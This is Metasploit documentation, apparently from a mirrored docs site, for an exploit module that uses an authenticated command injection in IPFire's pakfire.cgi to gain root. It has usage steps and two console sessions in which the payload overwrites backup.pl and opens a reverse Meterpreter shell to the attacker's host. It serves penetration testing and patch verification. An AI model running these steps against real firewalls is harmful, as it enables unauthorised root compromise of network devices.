ContextQMD
Back to Metasploit Framework

Ipfire Pakfire Exec

documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md

6.4.1317.7 KB
Original Source

Vulnerable Application

IPFire 2.25 (Core Update 156) IPFire 2.21 (Core Update 126)

This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/ipfire_pakfire_exec
  3. Do: set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>
  4. Do: set password <PASSWORD FOR admin USER ON THE WEB PORTAL>
  5. Do: set rhost <TARGET IP>
  6. Do: set lhost <YOUR IP>
  7. Do: exploit
  8. You should get a shell as the root user.

Options

USERNAME

Username of the administrative user you are authenticating to the web portal as.

PASSWORD

Password for the administrative user you are authenticating to the web portal as.

Scenarios

IPFire 2.21 (Core Update 126)

msf > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
RHOSTS => 172.29.202.191
msf exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Backing up backup.pl to /tmp/1TiE8...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.191
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 28379 created.
Channel 1 created.
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#

IPFire 2.25 (Core Update 156)

msf > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
RHOST => 172.29.202.157
msf exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Backing up backup.pl to /tmp/8Yndo...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.157
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 10179 created.
Channel 1 created.
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0#